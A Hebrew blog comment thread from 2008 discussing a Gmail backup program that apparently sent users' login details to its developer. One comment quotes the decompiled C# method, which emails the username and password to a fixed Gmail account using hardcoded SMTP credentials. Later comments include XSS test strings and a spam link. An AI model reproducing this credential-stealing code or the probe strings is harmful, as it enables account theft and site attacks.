22 תגובות לקטע “תוכנת גיבוי ל-gmail חושפת את הסיסמה שלכם.”

1. גלעד-flint כתב\ה:
   12 במרץ 2008 בשעה 13:29

   איזה באסה למשתמשים..
   לדעתי אם הקוד היה קוד פתוח אז היו מוצאים את זה יותר מהר.. וזה דווקא טוב לאבטחה.

2. L[s]D כתב\ה:
   12 במרץ 2008 בשעה 15:02

   לא הבנתי.. הג'ון טרי הזה או איך שלא כותבים את השם שלו לא קשור בשום דרך לגוגל?

3. B100 כתב\ה:
   12 במרץ 2008 בשעה 21:08

   עד כמה מתכנת יכול להיות מטומטם?

4. דרור שניר כתב\ה:
   13 במרץ 2008 בשעה 0:35

   גיא, אני לא מסכים איתך - ההבדל הוא שבקוד פתוח (לרוב, אני לא מתייחס כאן לפרויקטים של מתכנת יחיד) אנשים אחרים עוברים על הקוד כל הזמן. מבחינה זו, זה ממש כמו תיקון שגיאות מכוונות בויקיפדיה.
   כמו שמישהו ציין גם בתגובות לפוסט המקורי (לא, לא קראתי את כולן - 300 תגובות! יש גם יתרונות לזעירותה של הבלוגוספירה הישראלית), משום מה אין התייחסות לחוסר האתיקה שב-reverse engineering של הקוד. מילא אם הבחור שגילה את זה היה מומחה אבטחה, אבל הוא מתכנת שעשה את זה במטרה מוצהרת לגנוב קטעי קוד.

   B100, לא מתכנת מטומטם כמו קרימינל גרוע ורשלן.

5. הראל משה כתב\ה:
   13 במרץ 2008 בשעה 0:46

   כל הסיפור מפוברק, תקראו את התגובות בכתבת המקור: http://www.codinghorror.com/blog/archives/001072.html

6. גיא מזרחי כתב\ה:
   13 במרץ 2008 בשעה 1:31

   הראל משה: איך החלטת שהסיפור מפוברק?
   עברתי על חלק מהתגובות (לא על הכל אבל על הרוב).
   יש שם כמה שטוענים שהם לא הצליחו למצוא את הקטע הבעייתי ומסתבר שהם חיפוש בקובץ הEXE במקום באחד הDLL..
   יש שם אפילו קטע מהקוד הבעייתי:

   ne thing is true — if you DL the program and use reflector, you do indeed see the facts as they are described in this post:

   public static void CheckConnection(string a, string b)
   {
   try
   {
   MailMessage message = new MailMessage();
   message.To.Add("JTerry79@gmail.com");
   message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
   message.Subject = "Account";
   message.SubjectEncoding = Encoding.UTF8;
   message.Body = "Username: " + a;
   message.Body = message.Body + "\r\nPassword: " + b;
   message.BodyEncoding = Encoding.UTF8;
   message.IsBodyHtml = false;
   message.Priority = MailPriority.High;
   SmtpClient client = new SmtpClient();
   client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482″);
   client.Port = 0×24b;
   client.Host = "smtp.gmail.com";
   client.EnableSsl = true;
   client.Send(message);
   }
   catch (Exception)
   {
   }
   }

7. גיא מזרחי כתב\ה:
   13 במרץ 2008 בשעה 1:38

   דרור שניר: ברור גם לי שאם אתה מנסה לדחוף חתיכות קוד זדוני בתוכנות קוד פתוח שעובדים עליהם כמות גדולה של מתכנתים, זה יתגלה מהר.
   הבעיה הרצינית לדעתי לאו דווקא נובעת מזה שהעניין יתגלה אלא משני דברים אחרים:
   1. גם אם העניין יתגלה - הגיקים יידעו אבל חסרי הידע יתקינו בכל זאת.
   2. תוכנות קטנות ושוליות בעלות כמה מאות או אלפי התקנות של מפתח יחיד או קבוצה מצומצת של מפתחים עדיין יכולות חשופות לבעיה.

   לגבי חוסר האתיקה.
   זה נכון.
   הוא גם עבר על החוק כשהוא נכנס לחשבון GMAIL שלא שייך לו ועבר שוב על החוק כששינה בו את הסיסמה.
   לא אתי אבל בהחלט טוב שבוצע.

8. הראל משה כתב\ה:
   13 במרץ 2008 בשעה 14:09

   מה שאני אומר זה, איזה הוכחות יש לנו שהסיפור באמת נכון?
   1. יש לנו תגובות ממשתמשים שטוענים שכן ותגובות ממשתמשים שטוענים שלא!
   2. ההוכחה היחידה זה תצלומי המסך שהוא מציג בכתבה.
   השאלה שלי היא האם ניסית לבדוק את זה בעצמך או שפשוט קנית את כל הסיפור מכמה תגובות ותצלום מסך שאותי לא שיכנעו במיוחד.
   3. אני בטוח שאתה יודע שכל תוכנת URL Snooper פשוטה יכולה לגלות פעילות שכזאת, לא צריך לבצע reverse engineering

   בקיצור, הייתי אומר שקצת ניפוחו את הסיפור
   העדיות לא משכנעות מספיק ובטח לא הצורך בתוכנה כזאת.
   למה שמישהו ישלם 30$ לתוכנת גיבויי לגימייל?
   הרי אפשר לעשות את חינם בקלי קלות + לגוגל יש API
   שנועדה בידיוק למשימות כמו אלו, לכן זה לא מצדיק את הצורך של התוכנה לשם משתמש וסיסמה מצד המשתמש.

   מה שכן זה נושא מרתק וסקסי….אז למה לא לנפח אותו קצת.
   זוהיא לפחות דעתי…

9. גיא מזרחי כתב\ה:
   13 במרץ 2008 בשעה 16:20

   1. לא, לא בדקתי את זה בעצמי. אין לי את הזמן והרצון לבדוק תוכנה שאני לא עובד איתה.
   2. אם אתה חושב שאנשים לא ישלמו על תוכנה כי יש אחרות שעושות אותו דבר יותר טוב והן לא עולות כסף יש לי רק מילה אחת להגיד לך: Windows. טוב, שתיים: גם Office.
   3. ברור שאפשר לגלות את זה בעוד הרבה שיטות. הבחור כתב מה הוא עשה.
   לגבי לבדוק את התוכנה כרגע - אין אפשרות.
   לפי מה שהבנתי הסירו את הגרסה הבעייתית והעלו אחת אחרת במקומה.

   הדבר שמדהים אותי יותר מהעובדה שדבר כזה יכול לקרות (הרי הנושא הזה עלה בבלוג שלי לא פעם) זה שאתה קובע בבטחון:
   "כל הסיפור מפוברק, תקראו את התגובות בכתבת המקור" כשלא עשית שום דבר כדי לבדוק אם זה נכון או לא.
   אכן, אחראי מאוד.
   דבר נוסף - אתה מבקר אותי שאני מסתמך על הכתוב שם אבל אתה מסתמך על תגובות בודדות שמכחישות.

   רק כדי לסכם את הנושא:
   המפתח עצמו הודה שהוא הכניס קוד כזה למטרות Debug והוא פשוט "שכח" להסיר את הקוד.
   אולי פיספת את זה כשקראת את הכתבה המקורית.

10. הראל משה כתב\ה:
    13 במרץ 2008 בשעה 18:43

    אני לא מסתמך על שום דבר ולא מצהיר בביטחון, דעתי היא שמשהוא מסריח פה ויש לא מעט סיבות למה אני חושב ככה.
    אם בא לך להאמין, לך על זה ידידי אבל אולי כדי שלא תשלול את האופצייה השנייה.
    ולא לא פיספסתי שום דבר, כמו בכל נושא שאני כותב עליו, חרשתי את האינטרנט כדי למצוא דעות של אנשים אחרים ונחש מה, הדעות חלוקות….
    אז אולי כדי שתבדוק למה אני חושב ככה במקום לשלול אותי על הסף
    בכל מקרה, שיהיה ערב טוב…

11. גיא מזרחי כתב\ה:
    13 במרץ 2008 בשעה 19:04

    אני לא שולל על הסף.
    מה שכן - התגובה שלך העידה כאילו שיש באמת הוכחה לזה שהעניין מפוברק.
    מה שבאמת קורה זה שאין לאף אחד דרך לבדוק את העניין.
    שיהיה לך ערב נהדר (והרשה לי לציין שיש לך אחלה בלוג ).

12. הראל משה כתב\ה:
    13 במרץ 2008 בשעה 20:01

    תודה, גם לך!
    נתראה בחלון התגובות של הנושא הבא…
    ביי לבנתיים.

13. T0-R3ST כתב\ה:
    15 במרץ 2008 בשעה 23:31

    אכן עד כמה יכול להיות מתכנת מטומתם? לפחות היה מצפין את הסיסמה שלו או משהו חחח ד"א נשמע מעניין אני מתחיל ללמוד את העניין של Reversing איזה שפות תכנות יעזרו לי או האם זה דורש?

14. עמרי כתב\ה:
    16 במרץ 2008 בשעה 3:45

    קוד מקומפל שניתן להנדסה לאחור הוא ממש לא כמו קוד פתוח.
    קודם כל, איכות הפלט של הכלים האלו היא בדרך כלל די נמוכה כי הרבה מידע הולך לאיבוד בקימפול.
    דבר שני, עצם זה שצריך לבצע פעולה של הנדסה לאחור של קובץ בינארי - זה כבר מחסום רציני.
    ההשוואה הזו ממש לא במקום, כמו שאמרו כבר - קוד זמין גורם לכך שאנשים יסתכלו.
    כאנלוגיה:
    יש לך חדר, אם הדלת סגורה - כמה אנשים ינסו לבדוק בכלל אם היא נעולה ויציצו פנימה?
    לעומת זאת, אם הדלת פתוחה - כמה אנשים יציצו פנימה?

    לגבי השאלה אם הוא מטומטם:
    תחשבו על זה ככה:
    * תהליך הכניסה לג'ימייל מוצפן, אז לא - אי אפשק לדעת מה התוכנה עושה בקלות על ידי רחרוח של הרשת משה.
    * התוכנה צריכה להתחבר לג'ימייל כדי לבצע את מה שהיא אמורה לבצע. ככה שגם אם מישהו ירחרח ויראה תעבורת SSL לגוגל, הוא לא יחשוד.
    אני לא בטוח בכלל שהוא מטומטם, אולי הוא בסך הכל לא ידע שאפשר לבצע קימפול לאחור (TM) של קוד C# כל כך בקלות.

15. T0-R3ST כתב\ה:
    16 במרץ 2008 בשעה 22:16

    מישהו יכול לענות לי על השאלות למעלה :P?

16. dsa כתב\ה:
    24 במרץ 2008 בשעה 23:21

    איזה מסכנים המשתמשיםם
    במילים אחרות זה נקרא קיילוגר לא?!

17. dsa כתב\ה:
    24 במרץ 2008 בשעה 23:26

    '>"alert("xss")'<"

18. dsa כתב\ה:
    24 במרץ 2008 בשעה 23:27

    '">"""<"'

19. B100 כתב\ה:
    25 במרץ 2008 בשעה 6:52

    גיא, אתה חייב להודות שיש פה קוראים הזויים לגמרי לפעמים…

20. הגדרות בתוכנות דואר » ITbananas כתב\ה:
    16 באפריל 2008 בשעה 1:09

    [...] פרימיום" מה שאומר הרשמה בכסף. ראה גם: תוכנת גיבוי ל-gmail חושפת את הסיסמה שלכם. הגדרות יצוא ויבוא מתוכנות דואר שונות הוראות יצוא [...]

21. warren כתב\ה:
    14 בספטמבר 2008 בשעה 5:18

    Good 235rter2rwer23r

22. olga כתב\ה:
    19 בספטמבר 2008 בשעה 23:01

    http://groups.google.com/group/nheb-horny-disney-1